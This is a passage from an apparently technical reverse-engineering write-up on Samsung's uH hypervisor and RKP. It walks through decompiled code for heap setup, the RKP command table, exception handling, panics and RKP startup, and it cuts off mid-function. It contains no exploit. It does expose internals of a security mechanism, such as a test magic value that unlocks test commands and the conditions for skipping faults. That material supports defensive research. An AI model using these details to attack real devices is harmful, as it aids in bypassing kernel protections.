int64_t uh_add_dynamic_region(int64_t addr, int64_t size) {
uh_call(0xC300C000, 2, addr, size, 0, 0);
return 0;
}
void uh_call(...) {
asm("hvc #0");
}
The command handler #2, which we named init_cmd_add_dynamic_region
, is used to add a range of DDR memory to the dynamic_regions
memlist, out of which will be carved the "dynamic heap" region of uH. S-Boot indicates to the hypervisor which physical memory regions it can access once DDR has been initialized.
int64_t init_cmd_add_dynamic_region(saved_regs_t* regs) {
// ...
// Ensure the dynamic heap allocator hasn't already been initialized.
if (uh_state.dynamic_heap_inited || !regs->x2 || !regs->x3) {
return -1;
}
// Add the given memory range to the dynamic regions memlist.
return memlist_add(&uh_state.dynamic_regions, regs->x2, regs->x3);
}
The command handler #4, which we named init_cmd_initialize_dynamic_heap
, is used to finalize the list of dynamic memory regions and initialize the dynamic heap allocator from it. S-Boot calls it once all DDR memory has been added using the previous command. This function verifies its arguments, sets the starting physical address of the kernel to the very lowest DDR memory address, and finally calls initialize_dynamic_heap
.
int64_t init_cmd_initialize_dynamic_heap(saved_regs_t* regs) {
// ...
// Ensure the dynamic heap allocator hasn't already been initialized.
if (uh_state.dynamic_heap_inited || !regs->x2 || !regs->x3) {
return -1;
}
// Set the start of kernel physical memory to the lowest DDR address.
PHYS_OFFSET = memlist_get_min_addr(&uh_state.dynamic_regions);
// Ensure the S-Boot pointers are not in hypervisor memory.
base = check_and_convert_kernel_input(regs->x2);
size = check_and_convert_kernel_input(regs->x3);
if (!base || !size) {
uh_log('L', "main.c", 188, "Wrong addr in dynamicheap : base: %p, size: %p", base, size);
return -1;
}
// Initialize the dynamic heap allocator.
return initialize_dynamic_heap(base, size, regs->x4);
}
initialize_dynamic_heap
will first compute the dynamic heap base address and size. If those values are provided by S-Boot, they are used directly. If the size is not provided, it is calculated automatically. If the base address is not provided, a DDR memory region of the right size is carved automatically. The function then calls dynamic_heap_initialize
, which saves the chosen range into global variables and initializes the list of heap chunks, similarly to the static heap allocator. It initializes three sparsemaps, physmap
, ro_bitmap
, and dbl_bitmap
, that we will be detailing later. Finally, it initializes the robuf_regions
memlist, the robuf
sparsemap, and allocates a buffer to contain read-only pages to be used by the kernel.
int64_t initialize_dynamic_heap(uint64_t* base, uint64_t* size, uint64_t flag) {
// Ensure the dynamic heap allocator hasn't already been initialized.
if (uh_state.dynamic_heap_inited) {
return -1;
}
// And mark it as initialized.
uh_state.dynamic_heap_inited = 1;
// The dynamic heap size can be provided by S-Boot, or calculated automatically.
if (flag) {
dynamic_heap_size = *size;
} else {
dynamic_heap_size = get_dynamic_heap_size();
}
// The dynamic heap base can be provided by S-Boot. In that case, the range provided is removed from the
// `dynamic_regions` memlist. Otherwise, a range of the requested size is automatically removed from the
// `dynamic_regions` memlist and is returned.
if (*base) {
dynamic_heap_base = *base;
if (memlist_remove(&uh_state.dynamic_regions, dynamic_heap_base, dynamic_heap_size)) {
uh_log('L', "main.c", 281, "[-] Dynamic heap address is not existed in memlist, base : %p", dynamic_heap_base);
return -1;
}
} else {
dynamic_heap_base = memlist_get_region_of_size(&uh_state.dynamic_regions, dynamic_heap_size, 0x200000);
}
// Actually initialize the dynamic heap allocator using the provided or computed base address and size.
dynamic_heap_initialize(dynamic_heap_base, dynamic_heap_size);
uh_log('L', "main.c", 288, "[+] Dynamic heap initialized base: %lx, size: %lx", dynamic_heap_base, dynamic_heap_size);
// Copy the dynamic heap base address and size back to S-Boot.
*base = dynamic_heap_base;
*size = dynamic_heap_size;
// Map the dynamic heap in the second stage at EL1 as writable.
mapped_start = dynamic_heap_base;
if (s2_map(dynamic_heap_base, dynamic_heap_size_0, UNKN1 | WRITE | READ, &mapped_start) < 0) {
uh_log('L', "main.c", 299, "s2_map returned false, start : %p, size : %p", mapped_start, dynamic_heap_size);
return -1;
}
// Create 3 new sparsemaps: `physmap`, `ro_bitmap` and `dbl_bitmap` mapping all the remaining DDR memory. The physmap
// internal entries are also added to the protected ranges as they are critical to the hypervisor security.
sparsemap_init("physmap", &uh_state.phys_map, &uh_state.dynamic_regions, 0x20, 0);
sparsemap_for_all_entries(&uh_state.phys_map, protected_ranges_add);
sparsemap_init("ro_bitmap", &uh_state.ro_bitmap, &uh_state.dynamic_regions, 1, 0);
sparsemap_init("dbl_bitmap", &uh_state.dbl_bitmap, &uh_state.dynamic_regions, 1, 0);
// Create a new memlist that will be used to allocate memory pages for page tables management. This memlist is
// initialized with all the remaining DDR memory.
memlist_init(&uh_state.page_allocator.list);
memlist_add(&uh_state.page_allocator.list, dynamic_heap_base, dynamic_heap_size);
// Create a new sparsemap mapping all the pages from the previous memlist.
sparsemap_init("robuf", &uh_state.page_allocator.map, &uh_state.page_allocator.list, 1, 0);
// Allocates a chunk of memory for the robuf allocator (RO pages for the kernel).
allocate_robuf();
// Unmap all the unused DDR memory that might remain below 0xa00000000.
regions_end_addr = memlist_get_max_addr(&uh_state.dynamic_regions);
if ((regions_end_addr >> 33) <= 4) {
s2_unmap(regions_end_addr, 0xa00000000 - regions_end_addr);
s1_unmap(regions_end_addr, 0xa00000000 - regions_end_addr);
}
return 0;
}
If the size is not provided by S-Boot, get_dynamic_heap_size
is called. It first calculates and sets the robuf
size: 1 MB per GB of DDR memory, plus 6 MB. Then it calculates and returns the dynamic heap size: 4 MB per GB of DDR memory, plus 6 MB, rounded up to 8 MB.
uint64_t get_dynamic_heap_size() {
// ...
// Do some housekeeping on the memlist.
memlist_merge_ranges(&uh_state.dynamic_regions);
memlist_dump(&uh_state.dynamic_regions);
// Calculate a first dynamic size, depending on the amount of DDR memory, to be added to a fixed robuf size.
some_size1 = memlist_get_contiguous_gigabytes(&uh_state.dynamic_regions, 0x100000);
set_robuf_size(some_size1 + 0x600000);
// Calculate a second and third dynamic sizes, to be added to the robuf size, to get the dynamic heap size.
some_size2 = memlist_get_contiguous_gigabytes(&uh_state.dynamic_regions, 0x100000);
some_size3 = memlist_get_contiguous_gigabytes(&uh_state.dynamic_regions, 0x200000);
dynamic_heap_size = some_size1 + 0x600000 + some_size2 + some_size3;
// Ceil the dynamic heap size to 0x200000 bytes.
return (dynamic_heap_size + 0x1fffff) & 0xffe00000;
}
allocate_robuf
tries to allocate a region of robuf_size
from the dynamic heap allocator that was initialized moments ago. If that is not possible, it grabs the last contiguous chunk of memory available in the allocator. It then calls page_allocator_init
with this memory region as an argument. page_allocator_init
initializes the sparsemap and everything that the page allocator will use. The page allocator and the "robuf" region are what will be used by RKP for handing out read-only pages to the kernel (for the data protection feature, for example).
int64_t allocate_robuf() {
// ...
// Ensure the dynamic heap allocator has been initialized.
if (!uh_state.dynamic_heap_inited) {
uh_log('L', "page_allocator.c", 84, "Dynamic heap needs to be initialized");
return -1;
}
// Ceil the robuf size to the size of a page.
robuf_size = uh_state.page_allocator.robuf_size & 0xfffff000;
// Allocate the robuf from the dynamic heap allocator.
robuf_base = dynamic_heap_alloc(uh_state.page_allocator.robuf_size & 0xfffff000, 0x1000);
// If the allocation failed, use the last memory chunk from the dynamic heap allocator.
if (!robuf_base) {
dynamic_heap_alloc_last_chunk(&robuf_base, &robuf_size);
}
if (!robuf_base) {
uh_log('L', "page_allocator.c", 96, "Robuffer Alloc Fail");
return -1;
}
// Clear the data cache for all robuf addresses.
if (robuf_size) {
offset = 0;
do {
zero_data_cache_page(robuf_base + offset);
offset += 0x1000;
} while (offset < robuf_size);
}
// Finally, initialize the page allocator using the robuf memory region.
return page_allocator_init(&uh_state.page_allocator, robuf_base, robuf_size);
}
APP_RKP
¶The command handlers registered for APP_RKP
are:
Command ID | Command Handler | Maximum Calls |
---|---|---|
0x00 | rkp_cmd_init |
0 |
0x01 | rkp_cmd_start |
1 |
0x02 | rkp_cmd_deferred_start |
1 |
0x03 | rkp_cmd_write_pgt1 |
- |
0x04 | rkp_cmd_write_pgt2 |
- |
0x05 | rkp_cmd_write_pgt3 |
- |
0x06 | rkp_cmd_emult_ttbr0 |
- |
0x07 | rkp_cmd_emult_ttbr1 |
- |
0x08 | rkp_cmd_emult_doresume |
- |
0x09 | rkp_cmd_free_pgd |
- |
0x0A | rkp_cmd_new_pgd |
- |
0x0B | rkp_cmd_kaslr_mem |
0 |
0x0D | rkp_cmd_jopp_init |
1 |
0x0E | rkp_cmd_ropp_init |
1 |
0x0F | rkp_cmd_ropp_save |
0 |
0x10 | rkp_cmd_ropp_reload |
- |
0x11 | rkp_cmd_rkp_robuffer_alloc |
- |
0x12 | rkp_cmd_rkp_robuffer_free |
- |
0x13 | rkp_cmd_get_ro_bitmap |
1 |
0x14 | rkp_cmd_get_dbl_bitmap |
1 |
0x15 | rkp_cmd_get_rkp_get_buffer_bitmap |
1 |
0x17 | rkp_cmd_id_0x17 |
- |
0x18 | rkp_cmd_set_sctlr_el1 |
- |
0x19 | rkp_cmd_set_tcr_el1 |
- |
0x1A | rkp_cmd_set_contextidr_el1 |
- |
0x1B | rkp_cmd_id_0x1B |
- |
0x20 | rkp_cmd_dynamic_load |
- |
0x40 | rkp_cmd_cred_init |
1 |
0x41 | rkp_cmd_assign_ns_size |
1 |
0x42 | rkp_cmd_assign_cred_size |
1 |
0x43 | rkp_cmd_pgd_assign |
- |
0x44 | rkp_cmd_cred_set_fp |
- |
0x45 | rkp_cmd_cred_set_security |
- |
0x46 | rkp_cmd_assign_creds |
- |
0x48 | rkp_cmd_ro_free_pages |
- |
0x4A | rkp_cmd_prot_dble_map |
- |
0x4B | rkp_cmd_mark_ppt |
- |
0x4E | rkp_cmd_set_pages_ro_tsec_jar |
- |
0x4F | rkp_cmd_set_pages_ro_vfsmnt_jar |
- |
0x50 | rkp_cmd_set_pages_ro_cred_jar |
- |
0x51 | rkp_cmd_id_0x51 |
1 |
0x52 | rkp_cmd_init_ns |
- |
0x53 | rkp_cmd_ns_set_root_sb |
- |
0x54 | rkp_cmd_ns_set_flags |
- |
0x55 | rkp_cmd_ns_set_data |
- |
0x56 | rkp_cmd_ns_set_sys_vfsmnt |
5 |
0x57 | rkp_cmd_id_0x57 |
- |
0x60 | rkp_cmd_selinux_initialized |
- |
0x81 | rkp_cmd_test_get_par |
0 |
0x82 | rkp_cmd_test_get_wxn |
0 |
0x83 | rkp_cmd_test_ro_range |
0 |
0x84 | rkp_cmd_test_get_va_xn |
0 |
0x85 | rkp_check_vmm_unmapped |
0 |
0x86 | rkp_cmd_test_ro |
0 |
0x87 | rkp_cmd_id_0x87 |
0 |
0x88 | rkp_cmd_check_splintering_point |
0 |
0x89 | rkp_cmd_id_0x89 |
0 |
Let's take a look at command handler #0 called in uh_init
. It simply initializes the maximal number of times that each command can be called (enforced by the "checker" function) by calling the rkp_init_cmd_counts
function.
int64_t rkp_cmd_init() {
// Enable panic when a violation is detected.
rkp_panic_on_violation = 1;
// Initialize the counters of commands executions.
rkp_init_cmd_counts();
cs_init(&rkp_start_lock);
return 0;
}
An important part of a hypervisor is its exception handling code. These functions are called on various events: faulting memory accesses by the kernel, when the kernel executes an HVC instruction, etc. They can be found by looking at the vector table specified in the VBAR_EL2
register. We have seen in vmm_init
that the vector table is at vmm_vector_table
. From the ARMv8 specifications, we know it has the following structure:
Address | Exception Type | Description |
---|---|---|
+0x000 | Synchronous | Current EL with SP0 |
+0x080 | IRQ/vIRQ | |
+0x100 | FIQ/vFIQ | |
+0x180 | SError/vSError | |
+0x200 | Synchronous | Current EL with SPx |
+0x280 | IRQ/vIRQ | |
+0x300 | FIQ/vFIQ | |
+0x380 | SError/vSError | |
+0x400 | Synchronous | Lower EL using AArch64 |
+0x480 | IRQ/vIRQ | |
+0x500 | FIQ/vFIQ | |
+0x580 | SError/vSError | |
+0x600 | Synchronous | Lower EL using AArch32 |
+0x680 | IRQ/vIRQ | |
+0x700 | FIQ/vFIQ | |
+0x780 | SError/vSError |
Our device has a 64-bit kernel executing at EL1, so the hypervisor calls should be dispatched to the exception handler at vmm_vector_table+0x400
. But in the hypervisor, all the exception handlers end up calling the vmm_dispatch
function with different arguments.
void exception_handler(...) {
// ...
// Save registers x0 to x30, sp_el1, elr_el2, spsr_el2.
// ...
// Dispatch the exception to the VMM, passing it the exception level and type.
vmm_dispatch(<exc_level>, <exc_type>, ®s);
// Clear the local monitor and return to the caller.
asm("clrex");
asm("eret");
}
The level and type of the exception that has been taken are passed to vmm_dispatch
as arguments. For synchronous exceptions, it will call vmm_synchronous_handler
and panic if it returns a non-zero value. For all other exception types, it simply logs a message.
int64_t vmm_dispatch(int64_t level, int64_t type, saved_regs_t* regs) {
// ...
// If another core has called `vmm_panic`, panic on this core too.
if (has_panicked) {
vmm_panic(level, type, regs, "panic on another core");
}
// Handle the exception depending on its type.
switch (type) {
case 0x0: /* Synchronous */
// For synchronous exception, call the appropriate handler and panic if handling failed.
if (vmm_synchronous_handler(level, type, regs)) {
vmm_panic(level, type, regs, "syncronous handler failed");
}
break;
case 0x80: /* IRQ/vIRQ */
uh_log('D', "vmm.c", 1132, "RKP_e3b85960");
break;
case 0x100: /* FIQ/vFIQ */
uh_log('D', "vmm.c", 1135, "RKP_6d732e0a");
break;
case 0x180: /* SError/vSError */
uh_log('D', "vmm.c", 1149, "RKP_3c71de0a");
break;
default:
return 0;
}
return 0;
}
vmm_synchronous_handler
first gets the exception class by reading the ESR_EL2
register:
uh_handle_command
to dispatch it to the appropriate application command handler;other_msr_mrs_system
decide whether the write is allowed or not, and then resumes execution or panics depending on the function's return value;rkp_lxpgt_write
function corresponding to the target page table level. For translation faults at level 3, the fault is ignored if the address can be successfully translated (using AT S12E1R
or AT S12E1W
). For permission faults, the fault is ignored, and the TLBs are flushed if the address can be successfully translated (using AT S12E1W
). Aborts with a zero faulting address are skipped, and all other aborts result in a panic.int64_t vmm_synchronous_handler(int64_t level, int64_t type, saved_regs_t* regs) {
// ...
// ESR_EL2, Exception Syndrome Register (EL2).
//
// EC, bits [31:26]: Indicates the reason for the exception that this register holds information about.
esr_el2 = get_esr_el2();
switch (esr_el2 >> 26) {
case 0x12: /* HVC instruction execution in AArch32 state */
case 0x16: /* HVC instruction execution in AArch64 state */
// For HVC instruction execution, check if the HVC ID starts with 0xc300cXXX.
if ((regs->x0 & 0xfffff000) == 0xc300c000) {
app_id = regs->x0;
cmd_id = regs->x1;
// Reset the injection value for the current CPU.
cpu_num = get_current_cpu();
if (cpu_num <= 7) {
uh_state.injections[cpu_num] = 0;
}
// Dispatch the call to the application command handler.
uh_handle_command(app_id, cmd_id, regs);
}
return 0;
case 0x18: /* Trapped MSR, MRS or Sys. ins. execution in AArch64 state */
// For trapped system register accesses, first ensure that it is a write. If that's the case, call a handler to
// decide whether the operation is allowed or not.
//
// The handler gets the value that was being written to the system register from the saved general registers.
// Depending on which system register is being written, it will check if specific bits have a fixed value. If the
// write operation is allowed, ELR_EL2 is updated to make it point to the next instruction. If the operation is
// denied, the hypervisor will panic.
//
// - Direction, bit [0] = 0: Write access, including MSR instructions.
// - Op0/Op2/Op1/CRn/Rt/CRm, bits[21:1]: Values from the issued instruction.
if ((esr_el2 & 1) == 0 && !other_msr_mrs_system(®s->x0, esr_el2_1 & 0x1ffffff)) {
return 0;
}
vmm_panic(level, type, regs, "other_msr_mrs_system failure");
return 0;
case 0x20: /* Instruction Abort from a lower EL */
// ...
// For instruction aborts coming from a lower EL, if the bits patterns below all match and the number of
// instruction aborts skipped is less than 9, then the number is incremented and the abort is skipped.
//
// - IFSC, bits [5:0] = 0b000111: Translation fault, level 3.
// - S1PTW, bit [7] = 0b1: Fault on the stage 2 translation of an access for a stage 1 translation table walk.
// - EA, bit [9] = 0b0: Not an External Abort.
// - FnV, bit [10] = 0b0: FAR is valid.
// - SET, bits [12:11] = 0b00: Recoverable state (UER).
if (should_skip_prefetch_abort() == 1) {
return 0;
}
// If the faulting address is 0, the fault is injected back to be handled by EL1 and the injection value is set
// for the current CPU. Otherwise, the hypervisor panics.
if (!esr_ec_prefetch_abort_from_a_lower_exception_level("-snip-")) {
print_vmm_registers(regs);
return 0;
}
vmm_panic(level, type, regs, "esr_ec_prefetch_abort_from_a_lower_exception_level");
return 0;
case 0x21: /* Instruction Abort taken without a change in EL */
// For instruction aborts taken without a change in EL, meaning hypervisor faults, it panics.
uh_log('L', "vmm.c", 920, "esr abort iss: 0x%x", esr_el2 & 0x1ffffff);
vmm_panic(level, type, regs, "esr_ec_prefetch_abort_taken_without_a_change_in_exception_level");
case 0x24: /* Data Abort from a lower EL */
// For data aborts coming from a lower EL, it first calls `rkp_fault` to try to detect page table writes. That is
// when the faulting instruction is in the kernel text and is a `str x2, [x1]`. In addition, the x1 register must
// point to a page table entry. Then, depending on the page table level, it calls a different function:
//
// - rkp_l1pgt_write for level 1 PTs.
// - rkp_l2pgt_write for level 2 PTs.
// - rkp_l3pgt_write for level 3 PTs.
//
// If the kernel page table write is allowed, the PC is advanced to the next instruction.
if (!rkp_fault(regs)) {
return 0;
}
// For translation faults at level 3, convert the faulting IPA into a kernel VA. Then call the `el1_va_to_pa`
// function that will use the AT S12E1R/W instruction to translate it to a PA, as if the access was coming from
// EL1. If the address can be translated successfully, we return immediately.
//
// DFSC, bits [5:0] = 0b000111: Translation fault, level 3.
if ((esr_el2 & 0x3f) == 0b000111) {
// HPFAR_EL2, Hypervisor IPA Fault Address Register.
//
// Holds the faulting IPA for some aborts on a stage 2 translation taken to EL2.
va = rkp_get_va(get_hpfar_el2() << 8);
cs_enter(&s2_lock);
// el1_va_to_pa returns 0 if the address can be translated.
res = el1_va_to_pa(va, &ipa);
if (!res) {
uh_log('L', "vmm.c", 994, "Skipped data abort va: %p, ipa: %p", va, ipa);
cs_exit(&s2_lock);
return 0;
}
cs_exit(&s2_lock);
}
// For permission faults at any level, convert the faulting IPA into a kernel VA. Then use the AT S12E1W
// instruction to translate it to a PA, as if the access was coming from EL1. If the address can be translated
// successfully, invalidate the TLBs and return immediately.
//
// - WnR, bit [6] = 0b1: Abort caused by an instruction writing to a memory location.
// - DFSC, bits [5:0] = 0b0011xx: Permission fault, any level.
if ((esr_el2 & 0x7c) == 0x4c) {
va = rkp_get_va(get_hpfar_el2() << 8);
at_s12e1w(va);
// PAR_EL1, Physical Address Register.
//
// F, bit [0] = 0: Successful address translation.
if ((get_par_el1() & 1) == 0) {
print_el2_state();
invalidate_entire_s1_s2_el1_tlb();
return 0;
}
}
// ...
// For all other aborts, call the same function as the other instruction aborts.
if (esr_ec_prefetch_abort_from_a_lower_exception_level("-snip-")) {
vmm_panic(level, type, regs, "esr_ec_data_abort_from_a_lower_exception_level");
} else {
print_vmm_registers(regs);
}
return 0;
case 0x25: /* Data Abort taken without a change in EL */
// For data aborts taken without a change in EL, meaning hypervisor faults, it panics.
vmm_panic(level, type, regs, "esr_ec_data_abort_taken_without_a_change_in_exception_level");
return 0;
default:
return -1;
}
}
The vmm_panic
function, called when the hypervisor needs to panic, first logs the panic message, exception level, and type. If the MMU is disabled or the exception is not synchronous or taken from EL2, it then calls uh_panic
. Otherwise, it calls uh_panic_el1
.
crit_sec_t* vmm_panic(int64_t level, int64_t type, saved_regs_t* regs, char* message) {
// ...
uh_log('L', "vmm.c", 1171, ">>vmm_panic<<");
cs_enter(&panic_cs);
// Print the panic message.
uh_log('L', "vmm.c", 1175, "message: %s", message);
// Print the exception level.
switch (level) {
case 0x0:
uh_log('L', "vmm.c", 1179, "level: VMM_EXCEPTION_LEVEL_TAKEN_FROM_CURRENT_WITH_SP_EL0");
break;
case 0x200:
uh_log('L', "vmm.c", 1182, "level: VMM_EXCEPTION_LEVEL_TAKEN_FROM_CURRENT_WITH_SP_ELX");
break;
case 0x400:
uh_log('L', "vmm.c", 1185, "level: VMM_EXCEPTION_LEVEL_TAKEN_FROM_LOWER_USING_AARCH64");
break;
case 0x600:
uh_log('L', "vmm.c", 1188, "level: VMM_EXCEPTION_LEVEL_TAKEN_FROM_LOWER_USING_AARCH32");
break;
default:
uh_log('L', "vmm.c", 1191, "level: VMM_UNKNOWN\n");
break;
}
// Print the exception type.
switch (type) {
case 0x0:
uh_log('L', "vmm.c", 1197, "type: VMM_EXCEPTION_TYPE_SYNCHRONOUS");
break;
case 0x80:
uh_log('L', "vmm.c", 1200, "type: VMM_EXCEPTION_TYPE_IRQ_OR_VIRQ");
break;
case 0x100:
uh_log('L', "vmm.c", 1203, "type: VMM_SYSCALL\n");
break;
case 0x180:
uh_log('L', "vmm.c", 1206, "type: VMM_EXCEPTION_TYPE_SERROR_OR_VSERROR");
break;
default:
uh_log('L', "vmm.c", 1209, "type: VMM_UNKNOWN\n");
break;
}
print_vmm_registers(regs);
// SCTLR_EL1, System Control Register (EL1).
//
// M, bit [0] = 0b0: EL1&0 stage 1 address translation disabled.
if ((get_sctlr_el1() & 1) == 0 || type != 0 /* Synchronous */ ||
(level == 0 /* Current EL with SP0 */ || level == 0x200 /* Current EL with SP0 */)) {
has_panicked = 1;
cs_exit(&panic_cs);
// Reset the device immediately if the panic originated from another core.
if (!strcmp(message, "panic on another core")) {
exynos_reset(0x8800);
}
// Call `uh_panic` which will ultimately reset the device.
uh_panic();
}
// Call `uh_panic_el1` which will execute the registered kernel fault handler.
uh_panic_el1(uh_state.fault_handler, regs);
return cs_exit(&panic_cs);
}
uh_panic
calls print_state_and_reset
which logs the EL1 and EL2 system register values, and the hypervisor and kernel stack contents. It copies a textual version of those into the "bigdata" region, and then reboots the device.
void uh_panic() {
uh_log('L', "main.c", 482, "uh panic!");
print_state_and_reset();
}
void print_state_and_reset() {
// Print debug values.
uh_log('L', "panic.c", 29, "count state - page_ro: %lx, page_free: %lx, s2_breakdown: %lx", page_ro, page_free,
s2_breakdown);
// Print EL2 system registers values.
print_el2_state();
// Print EL1 system registers values.
print_el1_state();
// Print the content of the hypervisor and kernel stacks.
print_stack_contents();
// Store this information for the analytics system.
bigdata_store_data();
// Reset the device.
has_panicked = 1;
exynos_reset(0x8800);
}
uh_panic_el1
fills the uh_handler_data
structure, which we have seen previously, with the system and general register values. It then sets ELR_EL2
to the kernel fault handler so that it will be called upon executing the ERET
instruction.
int64_t uh_panic_el1(uh_handler_list_t* fault_handler, saved_regs_t* regs) {
// ...
// Ensure that a kernel fault handler is registered.
uh_log('L', "vmm.c", 111, ">>uh_panic_el1<<");
if (!fault_handler) {
uh_log('L', "vmm.c", 113, "uH handler did not registered");
uh_panic();
}
// Print EL2 system registers values.
print_el2_state();
// Print EL1 system registers values.
print_el1_state();
// Print the content of the hypervisor and kernel stacks.
print_stack_contents();
// Set the injection value for the current CPU, unless it has already been set, in which case it panics.
cpu_num = get_current_cpu();
if (cpu_num <= 7) {
something = cpu_num - 0x21530000;
if (uh_state.injections[cpu_num] == something) {
uh_log('D', "vmm.c", 99, "Injection locked");
}
uh_state.injections[cpu_num] = something;
}
// Fill the `uh_handler_data` structure with the registers values.
handler_data = &fault_handler->uh_handler_data[cpu_num];
handler_data->esr_el2 = get_esr_el2();
handler_data->elr_el2 = get_elr_el2();
handler_data->hcr_el2 = get_hcr_el2();
handler_data->far_el2 = get_far_el2();
handler_data->hpfar_el2 = get_hpfar_el2() << 8;
if (regs) {
memcpy(fault_handler->uh_handler_data[cpu_num].regs.regs, regs, 272);
}
// Finally, set ELR_EL2 to the kernel fault handler to execute it on exception return.
set_elr_el2(fault_handler->uh_handler);
return 0;
}
Now that we have seen how the hypervisor is initialized and how exceptions are handled, let's see how the RKP-specific parts are started.
RKP startup is performed in two stages using two different commands:
start_kernel
, right after mm_init
;kernel_init
, right before starting init
.On the kernel side, the first startup-related command is called in rkp_init
.
static void __init rkp_init(void)
{
// ...
rkp_init_data.vmalloc_end = (u64)high_memory;
rkp_init_data.init_mm_pgd = (u64)__pa(swapper_pg_dir);
rkp_init_data.id_map_pgd = (u64)__pa(idmap_pg_dir);
rkp_init_data.tramp_pgd = (u64)__pa(tramp_pg_dir);
#ifdef CONFIG_UH_RKP_FIMC_CHECK
rkp_init_data.no_fimc_verify = 1;
#endif
rkp_init_data.tramp_valias = (u64)TRAMP_VALIAS;
rkp_init_data.zero_pg_addr = (u64)__pa(empty_zero_page);
// ...
uh_call(UH_APP_RKP, RKP_START, (u64)&rkp_init_data, (u64)kimage_voffset, 0, 0);
}
This function fills a data structure of type rkp_init_t
that is given to the hypervisor. It contains information about the kernel memory layout.
rkp_init_t rkp_init_data __rkp_ro = {
.magic = RKP_INIT_MAGIC,
.vmalloc_start = VMALLOC_START,
.no_fimc_verify = 0,
.fimc_phys_addr = 0,
._text = (u64)_text,
._etext = (u64)_etext,
._srodata = (u64)__start_rodata,
._erodata = (u64)__end_rodata,
.large_memory = 0,
};
The rkp_init
function is called in start_kernel
, early in the kernel boot process.
asmlinkage __visible void __init start_kernel(void)
{
// ...
rkp_init();
// ...
}
On the hypervisor side, the command handler simply ensures that it can't be called twice, and calls rkp_start
after taking the appropriate lock.
int64_t rkp_cmd_start(saved_regs_t* regs) {
// ...
cs_enter(&rkp_start_lock);
// Make sure RKP is not already started.
if (rkp_inited) {
cs_exit(&rkp_start_lock);
uh_log('L', "rkp.c", 133, "RKP is already started");
return -1;
}
// Call the actual startup function.
res = rkp_start(regs);
cs_exit(&rkp_start_lock);
return res;
}
The rkp_start
function saves all the information about the kernel memory layout into global variables. It initializes two memlists, executable_regions
which contains all the kernel executable regions (including the kernel text), and dynamic_load_regions
which is used for the "dynamic executable loading" feature that won't be detailed in this blog post. It also protects the kernel sections by calling the rkp_paging_init
function and processes the user page tables by calling rkp_l1pgt_process_table
.
int64_t rkp_start(saved_regs_t* regs) {
// ...
// Save the offset between the kernel virtual and physical mappings into `KIMAGE_VOFFSET`.
KIMAGE_VOFFSET = regs->x3;
// Convert the address of the `rkp_init_data` structure from a VA to a PA using `rkp_get_pa`.
rkp_init_data = rkp_get_pa(regs->x2);
// Check the magic value.
if (rkp_init_data->magic - 0x5afe0001 >= 2) {
uh_log('L', "rkp_init.c", 85, "RKP INIT-Bad Magic(%d), %p", regs->x2, rkp_init_data);
return -1;
}
// If it is the test magic value, call `rkp_init_cmd_counts_test` which allows test commands 0x81-0x88 to be called an
// unlimited number of times.
if (rkp_init_data->magic == 0x5afe0002) {
rkp_init_cmd_counts_test();
rkp_test = 1;
}
// Saves the various fields of `rkp_init_data` into global variables.
INIT_MM_PGD = rkp_init_data->init_mm_pgd;
ID_MAP_PGD = rkp_init_data->id_map_pgd;
ZERO_PG_ADDR = rkp_init_data->zero_pg_addr;
TRAMP_PGD = rkp_init_data->tramp_pgd;
TRAMP_VALIAS = rkp_init_data->tramp_valias;
VMALLOC_START = rkp_init_data->vmalloc_start;
VMALLOC_END = rkp_init_data->vmalloc_end;
TEXT = rkp_init_data->_text;
ETEXT = rkp_init_data->_etext;
TEXT_PA = rkp_get_pa(TEXT);
ETEXT_PA = rkp_get_pa(ETEXT);
SRODATA = rkp_init_data->_srodata;
ERODATA = rkp_init_data->_erodata;
TRAMP_PGD_PAGE = TRAMP_PGD & 0xfffffffff000;
INIT_MM_PGD_PAGE = INIT_MM_PGD & 0xfffffffff000;
LARGE_MEMORY = rkp_init_data->large_memory;
page_ro = 0;
page_free = 0;
s2_breakdown = 0;
pmd_allocated_by_rkp = 0;
NO_FIMC_VERIFY = rkp_init_data->no_fimc_verify;
if (rkp_bitmap_init() < 0) {
uh_log('L', "rkp_init.c", 150, "Failed to init bitmap");
return -1;
}
// Create a new memlist to contain the list of kernel executable regions.
memlist_init(&executable_regions);
memlist_set_unkn_14(&executable_regions);
// Add the kernel text to the newly created memlist.
memlist_add(&executable_regions, TEXT, ETEXT - TEXT);
// Add the `TRAMP_VALIAS` page to the newly created memlist.
if (TRAMP_VALIAS) {
memlist_add(&executable_regions, TRAMP_VALIAS, 0x1000);
}
// Create a new memlist of dynamically loaded executable regions.
memlist_init(&dynamic_load_regions);
memlist_set_unkn_14(&dynamic_load_regions);
// Call a function that makes the static heap acquire all the unused dynamic memory.
put_all_dynamic_heap_chunks_in_static_heap();
// Map and protect various kernel regions in the second stage at EL1, and at EL2.
if (rkp_paging_init() < 0) {
uh_log('L', "rkp_init.c", 169, "rkp_pging_init fails");
return -1;
}
// Mark RKP as initialized.
rkp_inited = 1;
// Call a function that will process the user page tables.
if (rkp_l1pgt_process_table(get_ttbr0_el1() & 0xfffffffff000, 0, 1) < 0) {
uh_log('L', "rkp_init.c", 179, "processing l1pgt fails");
return -1;
}
// Log EL2 system registers values.
uh_log('L', "rkp_init.c", 183, "[*] HCR_EL2: %lx, SCTLR_EL2: %lx", get_hcr_el2(), get_sctlr_el2());
uh_log('L', "rkp_init.c", 184, "[*] VTTBR_EL2: %lx, TTBR0_EL2: %lx", get_vttbr_el2(), get_ttbr0_el2());
uh_log('L', "rkp_init.c", 185, "[*] MAIR_EL1: %lx, MAIR_EL2: %lx", get_mair_el1(), get_mair_el2());
uh_log('L', "rkp_init.c", 186, "RKP Activated");
return 0;
}
The rkp_set_kernel_rox
function marks the kernel text region as TEXT
in the phys_map
and makes it read-only from the hypervisor. The swapper_pg_dir
is made writable from the hypervisor, whereas the empty_zero_page
is made read-only executable from the kernel. The kernel text is made executable, and the log region and dynamic heap regions are made read-only from the kernel.
int64_t rkp_paging_init() {
// ...
// Ensure the start of the kernel text is page-aligned.
if (!TEXT || (TEXT & 0xfff) != 0) {
uh_log('L', "rkp_paging.c", 637, "kernel text start is not aligned, stext : %p", TEXT);
return -1;
}
// Ensure the end of the kernel text is page-aligned.
if (!ETEXT || (ETEXT & 0xfff) != 0) {
uh_log('L', "rkp_paging.c", 642, "kernel text end is not aligned, etext : %p", ETEXT);
return -1;
}
// Ensure the kernel text section doesn't contain the base address.
if (TEXT_PA <= get_base() && ETEXT_PA > get_base()) {
return -1;
}
// Unmap the hypervisor memory from the second stage (to make it inaccessible to the kernel).
if (s2_unmap(0x87000000, 0x200000)) {
return -1;
}
// Set the kernel text section as `TEXT` in the physmap.
